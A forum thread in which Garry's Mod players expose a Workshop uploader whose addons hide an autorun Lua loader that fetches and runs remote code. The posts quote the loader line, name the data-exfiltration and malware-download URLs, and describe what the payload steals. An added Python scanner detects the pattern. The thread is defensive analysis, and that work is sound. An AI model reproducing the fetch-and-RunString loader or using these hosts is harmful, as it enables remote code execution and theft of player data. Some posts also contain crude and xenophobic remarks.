Found a user on the workshop that's uploading addons with backdoors.
    39 replies, posted
https://steamcommunity.com/id/_BANNED783/myworkshopfiles/?appid=4000&p=1 this is the workshop link. Almost if not all of the addons (models included) have a script placed in autorun/client/something.lua which is:

--good luck in deobfuscation <3
http.Fetch("https://pastebin.com/raw/4k1kdj7J",RunString)

In the little bit that I've been able to actually deobfuscate I've noticed it sending data via http to hxxp://solly.ml/loges/loges.php. After it does that, it crashes the game. I've reported the addons as well as the pastebin link to the correct people, also posting here for reach.
--good luck in deobfuscation <3 what a piece of shit
i expect nothing less from russians
*hacks your election*
I mean just look at the screenshots for this addon: https://steamcommunity.com/sharedfiles/filedetails/?id=1645014431
https://steamuserimages-a.akamaihd.net/ugc/956355284415322218/A11B04DACE9DE23B0EF3CFD074BE061A01C7352E/?imw=637
https://steamuserimages-a.akamaihd.net/ugc/956355284415322137/93C0CEA7315C566D021B761B169CAD52B342C0C4/?imw=637
Definitely got a thing going on with being an asshole.
I had a good laugh from these.
https://files.facepunch.com/forum/upload/418840/a83a767a-8b35-4f1c-993b-c5fe224b31a0/image.png Even though he just boosted the description, I still find the fact he didn't leave out the donate tab hilarious
I hate to bump this, but even though all his shit was removed, he's right back at it again and has three more-than-likely malicious addons. @Rubat Is it even possible to ban users from ever uploading to workshop ever again? This guy ain't gonna quit.
I have said many times, Steam moderation tools are completely useless garbage, so no. The user linked above has no workshop addons.
It's broke, the dude's still uploading. I can see his shit on the newest first page of the Gmod workshop sorting by models right now. Clicking on his name there brings up all his current garbage. https://files.facepunch.com/forum/upload/2014/74d6de10-1266-4b18-ab59-2f644c61c94e/image.png I flagged all of it.
this dude loves control characters as obfuscation apparently.
Already done it dw dude. It posts data to: http://solly.ml/turbomemes/suuuuuuuuuuus/ if you pass the right checks and returns a shit load more (I will get this in a minute).
Initial code: https://pastebin.com/raw/rvnwrcdT
Returned code: https://pastebin.com/raw/4K1Ct3i5
What the fuck? I can't even read half of that, what all is it fetching?
So by the looks of it they tried to stop it from running if someone was debugging it and force crashed their game. The code then posted all of their information to http://solly.ml/turbomemes/suuuuuuuuuuus/ which grabs the second pastebin link. This one puts a vgui on your client and copies their discord to your clipboard and then makes the server say this:

2 = hello invitation to our discord already copied to your clipboard
2 = 10 | your gmod will be closed in 10 seconds
2 = 9 | no need to debug my scripts anymore
2 = 8
2 = 7
2 = 6 | also all the information about you has already been sent to us
2 = 5
2 = 4
2 = 3
2 = 2
2 = 1 | see ya later

Also they tried to fetch and post to their discord link which is interesting.
They are not done re-uploading with malicious intentions yet it seems: https://files.facepunch.com/forum/upload/321820/fbaa1161-4ce1-44ba-8519-2dc88227e2bb/image.png Hilariously, they've now also begun renaming the malicious autorun Lua file to "model-installer.lua", as if such a thing was supposed to convince you not to open and investigate it: https://files.facepunch.com/forum/upload/321820/e7b80504-643d-4400-877e-3dadeee4259d/image.png Although supposedly, it is no longer existing workshop content that they are targeting.
lol, such a jerk
The guy is banned from uploading and can still do it? That sounds like a serious fucking exploit
This map kind of is a backdoor. It has something that prevents the map being loaded and just crashes you. Pretty sure this falls under the rule for Malicious Code https://steamcommunity.com/sharedfiles/filedetails/?id=1667522388
Seems to load perfectly fine for me.
I decompiled it, it doesn't actually have any backdoors. The reason it doesn't load is because the map's filename has a period in it, which Source interprets as the end of the filename. https://files.facepunch.com/forum/upload/109932/93b0ab34-99cf-4677-9c6a-7de8f3852b8a/image.png
He ain't banned, Rubat said a few posts up that he can't straight up ban anyone from uploading shit. Thanks, Valve.
If anyone cares, I ran it through the glua.team lua formatter™ and got most of the job done; the rest can be done with a simple script. You'll need to filter out the right-to-left override characters to be able to read it properly, but you can easily tell what it does atm anyways. https://gist.github.com/Velkon/d285618e3920f3910b79e30537a204be
With some nice find and replace spam, this is what the above looks like. https://pastebin.com/raw/L1erZKBa Doesn't really look any different from what DEADMONSTOR put up. However, I talked to a friend about this and unless they were using some exploit to get shit from outside Gmod's own bounds, all they can get is:

- Your location (probably derived from IP)
- What time it is on your system
- What language you're using
- Your username
- Your SteamID

It doesn't seem to make any additional attempts to fetch any files or anything else, like from your data folder or whatever. It seems like just one of those things where they're going "lol haha lets see how many people i can hit with this" and logs every hit to a database or something. Friend's thoughts: "If I had to REALLY guess, there's a possibility the entire point is to find out how many people they can reasonably get code executed on before getting caught before deploying their real shit." Seems as though getting caught doesn't really matter however; people really don't pay attention and/or don't read. Even when the comments and workshop submission discussions were chock full of "DON'T SUB TO THIS IT HAS MALICIOUS CODE", I could still sit and refresh the page and watch the current subscriber count go up. I'm also going to guess that a lot of them were people who can't even read English in the first place, since Gmod has a large non-English speaking playerbase, so they'd be none the wiser.
My bad lol, didn't see his post. But yeah, it should be common knowledge by now that the only malicious things that scripts can steal from you are your data folder (for some) and IP address.
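As an added defender-side example (not code from the thread or from any of the posters), here is a small scanner for the pattern described in the first post, an autorun client Lua file that hands an http.Fetch result to RunString, plus the bidi override and other control characters the later posts mention as obfuscation. The addon tree, file names and URL in SAMPLE_ADDON are constructed placeholders, not the real upload.

```python
import re
import unicodedata

# Unicode bidi embedding/override/isolate controls (U+202E is the RTL override
# mentioned in the thread); any of these inside Lua source is a red flag.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}

# Remote loader: body of an http.Fetch handed straight to RunString/CompileString.
# Simple textual check; it does not follow http["Fetch"]-style indirection.
LOADER_RE = re.compile(r"http\.Fetch\s*\(.*?(RunString|CompileString)", re.DOTALL)
# Files Garry's Mod runs automatically: lua/autorun/*.lua and lua/autorun/client/*.lua
AUTORUN_RE = re.compile(r"(^|/)lua/autorun/(client/)?[^/]+\.lua$")


def scan_lua(path, source):
    """Return a list of finding strings for one Lua file (empty if clean)."""
    findings = []
    if AUTORUN_RE.search(path) and LOADER_RE.search(source):
        findings.append("remote-loader: http.Fetch result passed to RunString/CompileString in autorun")
    bidi = sorted({hex(ord(c)) for c in source if c in BIDI_CONTROLS})
    if bidi:
        findings.append("bidi-control-chars: " + ",".join(bidi))
    # Other non-printing C0/C1 controls (tab/newline excluded) used to hide code
    other = sum(1 for c in source if unicodedata.category(c) == "Cc" and c not in "\t\r\n")
    if other:
        findings.append(f"control-chars: {other} non-printing characters")
    return findings


def scan_addon(files):
    """files: {relative_path: source_text}. Returns {path: findings} for flagged files only."""
    report = {}
    for path, src in files.items():
        if path.endswith(".lua"):
            found = scan_lua(path, src)
            if found:
                report[path] = found
    return report


# Constructed sample addon tree with a placeholder loader URL (not the real upload).
SAMPLE_ADDON = {
    "lua/autorun/client/model-installer.lua":
        '--good luck in deobfuscation <3\nhttp.Fetch("https://example.invalid/raw/PLACEHOLDER", RunString)\n',
    "lua/autorun/client/benign.lua": 'print("hello")\n',
    "lua/entities/ent.lua": 'local x = "a\u202e b"\n',
    "models/thing.mdl": "not lua",
}

if __name__ == "__main__":
    for path, found in scan_addon(SAMPLE_ADDON).items():
        print(path, "->", "; ".join(found))
```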
I flagged his addons and reported his profile (if that really works), surely getting community banned stops you from uploading to the Steam Workshop?
After looking into this more I found that he is doing more than this. I got someone coming to me with a DLL that someone said would fix some of his issues. After looking into it, it seems like it downloads a virus: http://solly.ml/c/a/c/loader.exe I would just like to say everyone that is given a DLL might wanna check up on what it does, because these are nasty exes that could fuck up your whole PC. Sorry about the bump, didn't want to make a new post. https://www.virustotal.com/#/file/6c97fe21e5d5387ce7df9caf890e4fe9626c876e67d0a6e3f97448c2b524f0f5/detection
I'd break that URL up so it isn't actually clickable on accident. So, the attack relies on someone else giving out a bad DLL? Had a bit of trouble following that part.
Broke the link, good choice. The DLL itself would need to be done on client, then it downloads the exe to C:\ProgramData123\ and runs it. https://i.imgur.com/Hwur7Wp.png https://i.imgur.com/Vu9xefj.png I would get more screenshots but I deleted the exe, I didn't want to touch it by accident.
If I'm correct, the initial attacks just required a backdoor'd addon. Handing out the DLL is probably their attempt to further fuck people over.
That program is super weird, just a quick strings on it shows a ton of Python stuff in it.